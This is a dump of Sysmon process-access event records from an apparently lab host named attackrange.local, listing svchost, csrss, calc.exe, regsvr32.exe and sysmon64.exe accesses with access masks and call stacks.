10341000x8000000000000000360117Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.562{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301
10341000x8000000000000000360116Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.562{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd
10341000x8000000000000000360115Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.562{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301
10341000x8000000000000000360114Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.562{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd
10341000x8000000000000000360113Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.562{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301
10341000x8000000000000000360112Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.562{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd
10341000x8000000000000000360111Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.562{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301
10341000x8000000000000000360110Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.562{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd
10341000x8000000000000000360109Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.562{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301
10341000x8000000000000000360108Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.546{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd
10341000x8000000000000000360107Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.546{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301
10341000x8000000000000000360106Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.546{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd
10341000x8000000000000000360105Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.546{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301
10341000x8000000000000000360104Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.546{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd
10341000x8000000000000000360103Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.546{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301
10341000x8000000000000000360102Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.546{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd
10341000x8000000000000000360101Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.546{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301
10341000x8000000000000000360100Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.546{8e433fbf-2a44-6013-1200-000000001100}11641580C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+111b6|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1
10341000x8000000000000000360099Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.546{8e433fbf-2a44-6013-1200-000000001100}11641580C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+106fe|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1
10341000x8000000000000000360098Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.546{8e433fbf-2a44-6013-1200-000000001100}11641580C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+108a0|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1
10341000x8000000000000000360097Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.546{8e433fbf-2a44-6013-1200-000000001100}11641580C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+10225|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1
10341000x8000000000000000360096Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.546{8e433fbf-3378-6013-6702-000000001100}29326308C:\Windows\system32\csrss.exe{8e433fbf-36df-6013-9f03-000000001100}10200C:\Windows\system32\regsvr32.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\system32\basesrv.DLL+2fba|C:\Windows\SYSTEM32\CSRSRV.dll+5af4|C:\Windows\SYSTEM32\ntdll.dll+6cedf
10341000x8000000000000000360095Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.546{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+37cee|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301
